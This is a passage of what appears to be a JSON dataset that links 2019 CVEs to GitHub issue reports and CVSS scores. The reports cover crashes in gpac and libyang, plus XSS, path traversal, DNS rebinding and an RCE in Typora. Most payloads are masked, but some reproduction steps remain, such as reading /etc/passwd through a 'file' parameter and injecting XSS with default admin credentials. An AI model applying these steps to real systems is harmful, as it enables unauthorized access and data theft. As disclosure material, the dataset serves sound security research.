        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1334",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-11-09T11:22:06Z",
        "description": "APITAG stack buffer overflow in a NUMBERTAG parse_tile_group APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-20161",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1320",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1320",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-10-28T15:50:52Z",
        "description": "APITAG heap buffer overflow in APITAG at APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (master NUMBERTAG ada NUMBERTAG e) Compile Command: APITAG Run Command: APITAG POC file: URLTAG ASAN info: ERRORTAG gdb info: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-20162",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1327",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1327",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-11-09T11:12:14Z",
        "description": "ERROR: APITAG heap buffer overflow in gf_isom_box_parse_ex APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG URLTAG For POC new gf_isom_box_parse_ex gdb info: CODETAG For POC new gf_isom_box_parse_e NUMBERTAG gdb info: CODETAG For POC new gf_isom_box_parse_ex ASAN info: ERRORTAG For POC new gf_isom_box_parse_e NUMBERTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-20163",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1335",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1335",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-11-09T11:23:01Z",
        "description": "APITAG SEGV in gf_odf_avc_cfg_write_bs APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-20164",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1332",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1332",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-11-09T11:19:52Z",
        "description": "APITAG SEGV in gf_isom_box_del APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: ERRORTAG ASAN info: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-20165",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1338",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1338",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-11-09T12:06:24Z",
        "description": "ERROR: APITAG SEGV in APITAG APITAG Hello, I found a similar issue but I am not sure they are the same. URLTAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-20166",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1331",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1331",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-11-09T11:18:44Z",
        "description": "APITAG SEGV in gf_isom_dump APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: ERRORTAG ASAN info: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-20167",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1330",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1330",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-11-09T11:17:12Z",
        "description": "APITAG SEGV in APITAG APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-20168",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1333",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1333",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-11-09T11:21:05Z",
        "description": "APITAG heap use after free in gf_isom_box_dump_ex APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-20169",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1329",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1329",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-11-09T11:15:44Z",
        "description": "APITAG heap use after free in APITAG APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-20170",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1328",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1328",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-11-09T11:14:15Z",
        "description": "APITAG SEGV in APITAG APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-20171",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1337",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1337",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-11-09T12:00:28Z",
        "description": "APITAG NUMBERTAG memory leaks of APITAG APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master NUMBERTAG dfc NUMBERTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: ERRORTAG ASAN info: ERRORTAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s).",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-20205",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/127",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/127",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2019-12-31T08:03:38Z",
        "description": "integer overflow in sixel_frame_resize in frame.c. In function APITAG , width and height can be specified by user. Line NUMBERTAG has an integer overflow. If width and height are very large numbers, allocation will fail. FILETAG poc: FILETAG result: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20208",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1348",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1348",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-11-13T07:25:13Z",
        "description": "There is a stack buffer overflow in the APITAG function of APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! \u221a] I looked for a similar issue and couldn't find any. [ \u221a] I tried with the latest version of GPAC. Installers available at URLTAG [ \u221a] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG A crafted input will lead to crash in box_code NUMBERTAG gpp.c at gpac NUMBERTAG Triggered by APITAG diso POC out /dev/null Poc NUMBERTAG stack APITAG URLTAG The ASAN information is as follows: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-20219",
        "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/15",
        "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/15",
        "Repo_new": "miniupnp/ngiflib",
        "Issue_Created_At": "2019-10-14T09:40:20Z",
        "description": "heap buffer overflow at APITAG in APITAG Tested in Ubuntu NUMBERTAG bit, ngiflib(master NUMBERTAG bef2a0) Triggered by gif2tga $POC POC file: FILETAG asan ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20329",
        "Issue_Url_old": "https://github.com/open-lambda/open-lambda/issues/92",
        "Issue_Url_new": "https://github.com/open-lambda/open-lambda/issues/92",
        "Repo_new": "open-lambda/open-lambda",
        "Issue_Created_At": "2019-12-16T06:22:47Z",
        "description": "OL Server vulnerable to DNS Rebinding attacks.. The Rest API spawned on port NUMBERTAG isn't validating the Host header , as such the server is vulnerable to DNS Rebinding attacks. Impact : By tricking users into visiting a website, it will be possible to perform all Rest Calls on behalf of user from the attackers website, bypassing the same origin policy using DNS rebind. Few actions are calling functions",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20330",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2526",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2526",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2019-10-25T20:55:07Z",
        "description": "Block two more gadget types (JNDI CVEs to be allocated). Another NUMBERTAG gadget ( ) types reported related to JNDI access. See URLTAG for description of the general problem. Mitre id: Mitre id: Original discoverer: APITAG Planned to be fixed in: not yet NUMBERTAG backported in NUMBERTAG branch (no release yet)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-20354",
        "Issue_Url_old": "https://github.com/colloqi/piSignage/issues/97",
        "Issue_Url_new": "https://github.com/colloqi/pisignage/issues/97",
        "Repo_new": "colloqi/pisignage",
        "Issue_Created_At": "2019-11-13T02:19:31Z",
        "description": "Path Traversal vulnerability. Describe the bug Suggested description of the vulnerability : A path traversal vulnerability in the web application component of APITAG NUMBERTAG allows a remote attacker authenticated as a low privilege user to download arbitrary files from the Raspberry Pi. Attack vector(s) FILETAG NUMBERTAG Click the Log Download button at the bottom of the APITAG administration page. FILETAG NUMBERTAG HTTP Packet is sent when the button is pressed. FILETAG NUMBERTAG Change the value of 'file' parameter to APITAG . FILETAG NUMBERTAG You can see that the /etc/passwd file is read. Affected URL/API(s) URL: APITAG Parameter: file Environment Raspberry Pi Hardware Version: Model NUMBERTAG B+ Revision NUMBERTAG Ram NUMBERTAG GB Sony UK APITAG Version: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20374",
        "Issue_Url_old": "https://github.com/typora/typora-issues/issues/3124",
        "Issue_Url_new": "https://github.com/typora/typora-issues/issues/3124",
        "Repo_new": "typora/typora-issues",
        "Issue_Created_At": "2019-12-27T22:37:51Z",
        "description": "Typora RCE via mXSS. Summary A mXSS in Typora leads to remote code execution. The vector is Mermaid code blocks (HTML labels) however other spots where Typora attempts to clean up HTML using APITAG could be prone to the same. Steps to reproduce / APITAG NUMBERTAG Create an .md with the following contents: ~~~ CODETAG NUMBERTAG Open the file in Typora NUMBERTAG Witness a calculator pop up: FILETAG The payload is simply HTML entity encoded ERRORTAG where the JS is simply: CODETAG Fix It's perhaps best to upgrade APITAG URLTAG to the latest version URLTAG which seems to address new mutation XSS vectors. It looks like the version that's shipped with Typora is somewhat old NUMBERTAG Consider employing Content Security Policy URLTAG for a broader mitigation. It appears that RCE via XSS emerges as a pattern among Typora's issues. Implementing a fine tuned CSP is time consuming but building a good policy step by step could prove worthy in the long run and cover users even when new XSS vectors are discovered. Notes Versions known to be vulnerable and tested are NUMBERTAG These are the latest downloads from the website (for Linux and APITAG respectively). I did not test the Windows version of the app. CVSS NUMBERTAG My take is FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.6,
        "impactScore": 6.0,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20377",
        "Issue_Url_old": "https://github.com/tophubs/TopList/issues/32",
        "Issue_Url_new": "https://github.com/tophubs/toplist/issues/32",
        "Repo_new": "tophubs/toplist",
        "Issue_Created_At": "2019-09-03T08:37:33Z",
        "description": "There is a Cross Site Scripting(XSS) Vulnerability. I watched a odd title when I visited your website",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20378",
        "Issue_Url_old": "https://github.com/ganglia/ganglia-web/issues/351",
        "Issue_Url_new": "https://github.com/ganglia/ganglia-web/issues/351",
        "Repo_new": "ganglia/ganglia-web",
        "Issue_Created_At": "2019-12-17T01:38:44Z",
        "description": "Two XSS issue found in.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20391",
        "Issue_Url_old": "https://github.com/CESNET/libyang/issues/772",
        "Issue_Url_new": "https://github.com/cesnet/libyang/issues/772",
        "Repo_new": "cesnet/libyang",
        "Issue_Created_At": "2019-04-26T17:01:20Z",
        "description": "Segmentation fault in yangfuzz and yanglint. Hi, here is another file that crashes yangfuzz and yanglint. ERRORTAG Regards",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20392",
        "Issue_Url_old": "https://github.com/CESNET/libyang/issues/723",
        "Issue_Url_new": "https://github.com/cesnet/libyang/issues/723",
        "Repo_new": "cesnet/libyang",
        "Issue_Created_At": "2019-03-07T19:25:40Z",
        "description": "Segmentation fault when if feature is used in list key node, with a non existing feature. If an if feature statement is used inside a list key node, and the feature used is not defined, yanglint and yangfuzz segfault in lys_parse_path. Here is an example of a yang file that crashes the parser: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20393",
        "Issue_Url_old": "https://github.com/CESNET/libyang/issues/742",
        "Issue_Url_new": "https://github.com/cesnet/libyang/issues/742",
        "Repo_new": "cesnet/libyang",
        "Issue_Created_At": "2019-03-29T11:16:03Z",
        "description": "Heap corruption in yyparse. Hi, this file crashes lys_parse_path: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20394",
        "Issue_Url_old": "https://github.com/CESNET/libyang/issues/769",
        "Issue_Url_new": "https://github.com/cesnet/libyang/issues/769",
        "Repo_new": "cesnet/libyang",
        "Issue_Created_At": "2019-04-26T09:14:19Z",
        "description": "Heap corruption in lys_parse_path due to type statement in notification statement. Hi, this file causes heap corruption and crashes lys_parse_path CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20395",
        "Issue_Url_old": "https://github.com/CESNET/libyang/issues/724",
        "Issue_Url_new": "https://github.com/cesnet/libyang/issues/724",
        "Repo_new": "cesnet/libyang",
        "Issue_Created_At": "2019-03-08T10:26:25Z",
        "description": "Segmentation fault due to self refential union type containing leafrefs. Hi, the following yang file causes a segmentation fault in lys_parse_path, caused by a stack overflow due to too many function calls. ERRORTAG The issue seems to be caused due to the self referential union type type containing a leaf ref. If the list5 leaf list is removed, the issue persists, but the stack overflow takes longer to appear. A gdb backtrace shows that the call stack is full of lys_copy_union_leafrefs calls, called in APITAG and APITAG Regards, Juraj",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20396",
        "Issue_Url_old": "https://github.com/CESNET/libyang/issues/740",
        "Issue_Url_new": "https://github.com/cesnet/libyang/issues/740",
        "Repo_new": "cesnet/libyang",
        "Issue_Created_At": "2019-03-29T10:38:30Z",
        "description": "Segmentation fault in yyparse due to malformed pattern statement value. Hello, this file crashes libyang when it is parsed with lys_parse_path: CODETAG Regards, Juraj",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20397",
        "Issue_Url_old": "https://github.com/CESNET/libyang/issues/739",
        "Issue_Url_new": "https://github.com/cesnet/libyang/issues/739",
        "Repo_new": "cesnet/libyang",
        "Issue_Created_At": "2019-03-28T09:31:50Z",
        "description": "Heap corruption due to invalid unterminated organization field in YANG file. Hello, this file crashes lys_parse_path: CODETAG Regards, Juraj",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20398",
        "Issue_Url_old": "https://github.com/CESNET/libyang/issues/773",
        "Issue_Url_new": "https://github.com/cesnet/libyang/issues/773",
        "Repo_new": "cesnet/libyang",
        "Issue_Created_At": "2019-04-29T13:21:12Z",
        "description": "Segmentation fault in yanglint and yangfuzz due to unprintable characters. Hi, this file crashes due to unprintable characters at the end of the file. Shortening the error message string removes the crash too, so I guess both issues are relevant. ERRORTAG Here is the file base NUMBERTAG encoded: CODETAG I've encoded the file with b NUMBERTAG rather than using the xxd output, since I assume decoding b NUMBERTAG is somewhat easier than creating the file from xxd. If you would prefer another format for files containing binary data, please let me know.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20421",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/1011",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/1011",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2019-09-30T12:02:01Z",
        "description": "An infinite loop and hang in APITAG Describe the bug An input file can result in an infinite loop and hang, with high CPU consumption. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file. To Reproduce Steps to reproduce the behaviour: excute PATHTAG APITAG Expected behavior An infinite loop and hang, with high CPU consumption FILETAG Additional context The poc is here FILETAG The code: > io_ APITAG > io_ APITAG APITAG leads to an infinite loop.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-20434",
        "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/17",
        "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/17",
        "Repo_new": "cybersecurityworks/disclosed",
        "Issue_Created_At": "2019-11-27T10:43:00Z",
        "description": "Multiple Reflected Cross Site Scripting (XSS) in WSO2 Product APITAG Analytics Server Version NUMBERTAG Details: WSO2 Product Bug Report Bug Name: Multiple APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 Data Analytics Server Product. APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Medium Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG Vulnerable URL: FILETAG Figure NUMBERTAG Access the APITAG URL APITAG FILETAG Figure NUMBERTAG Add new property. FILETAG Figure NUMBERTAG SS payload added to path variable and gets reflected in the response. FILETAG Figure NUMBERTAG Injected XSS payload gets reflected in the browser. FILETAG Figure NUMBERTAG SS payload added to name variable and gets reflected in the response. FILETAG Figure NUMBERTAG Injected XSS payload gets reflected in the browser. APITAG NUMBERTAG APITAG Access the GET request APITAG URL APITAG (added with XSS payload) directly to see XSS getting reflected in the browser. FILETAG Figure NUMBERTAG Access the APITAG URL APITAG to add new Data Source FILETAG Figure NUMBERTAG capturing the GET request and added XSS payload gets reflected in the response. FILETAG Figure NUMBERTAG Injected XSS payload, APITAG through vulnerable APITAG APITAG gets reflected whenever the user tries to access the APITAG URL. APITAG APITAG Steps APITAG APITAG NUMBERTAG APITAG NUMBERTAG Logon into data analytics server with given credentials (admin/admin in localhost) in the APITAG URL APITAG APITAG IP NUMBERTAG Now, access the APITAG URL APITAG NUMBERTAG Add new property and capture the request in proxy and send it to repeater NUMBERTAG Add XSS payload APITAG to APITAG path & name APITAG variable one by one NUMBERTAG Then, the Injected XSS Payload APITAG will get reflected in the response. APITAG NUMBERTAG APITAG NUMBERTAG Logon into data analytics server with given credentials (admin/admin in localhost) in the APITAG URL APITAG APITAG IP NUMBERTAG Now, access the APITAG URL APITAG to add new Data Source with encoded XSS payload APITAG and submit the data which gets reflected in the browser NUMBERTAG Or access the APITAG URL APITAG (added with XSS payload) directly to see XSS getting reflected in the browser. APITAG APITAG NUMBERTAG Discovered in WSO2 Data Analytics Server Product version NUMBERTAG Reported to EMAILTAG NUMBERTAG Got response from WSO2 security team, \"We are looking into the issues you have reported. We will keep you posted regarding the progress of our evaluation of them NUMBERTAG Got mail confirming the APITAG NUMBERTAG APITAG and rejecting the APITAG NUMBERTAG APITAG are not a valid issue NUMBERTAG Customer Announcement End of July, Public Announcement: End of August NUMBERTAG Customer Announcement is done. Public Announcement is scheduled NUMBERTAG Public Announcement is done. Please refer NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed APITAG WSO NUMBERTAG APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-20435",
        "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/18",
        "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/18",
        "Repo_new": "cybersecurityworks/disclosed",
        "Issue_Created_At": "2019-11-27T12:00:44Z",
        "description": "Reflected Cross Site Scripting (XSS) in WSO2 Product WSO2 API Manager version NUMBERTAG Details: WSO2 Product Bug Report Bug Name: APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 API Manager Product. APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Low Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG Vulnerable URL: FILETAG Vulnerable Variable: APITAG APITAG Description: Cross Site Scripting (XSS) vulnerability in WSO2 API Manager Product. By exploiting a Cross site scripting vulnerability the attacker can hijack a logged in user\u2019s session by stealing cookies which means that the malicious hacker can change the logged in user\u2019s password and invalidate the session of the victim while the hacker maintains access. Proof of concept: (POC) POST request APITAG variable is vulnerable to reflected cross site scripting (XSS) in the URL, FILETAG FILETAG Figure NUMBERTAG New document created in the API FILETAG Figure NUMBERTAG Choose APITAG Content\u2019 to edit document information. FILETAG Figure NUMBERTAG Actual GET request APITAG URL APITAG FILETAG Figure NUMBERTAG APITAG Crafted request APITAG with XSS payload, ERRORTAG gets reflected in the same browser as response. APITAG Steps APITAG NUMBERTAG Login to the application APITAG (admin/admin) APITAG through the login APITAG URL. APITAG NUMBERTAG Go to API APITAG APITAG APITAG section in the created API NUMBERTAG APITAG APITAG New document\u2019 APITAG details and submit it NUMBERTAG Go to APITAG APITAG Content\u2019 APITAG available to edit the document details NUMBERTAG Modify the APITAG URL APITAG variable, APITAG with a XSS payload, ERRORTAG NUMBERTAG Now, click on the APITAG crafted URL APITAG to execute the injected XSS payload every time. APITAG APITAG NUMBERTAG Discovered in WSO2 API Manager Product version NUMBERTAG Reported to EMAILTAG NUMBERTAG Got instant response from WSO2 security team, APITAG for reporting the issue. We'll look into this and get back to you. Appreciate your continued support NUMBERTAG Customer Announcement End of July, Public Announcement: End of August NUMBERTAG Customer Announcement is done. Public Announcement is scheduled NUMBERTAG Customer Announcement is done. Public Announcement is scheduled at the end of September. [postponed to September due to internal reasons NUMBERTAG Got mail saying, \"We have scheduled a public announcement for the issue by the end of this week NUMBERTAG Customer Announcement is done. Public Announcement is done. Please APITAG refer APITAG NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed on APITAG WSO 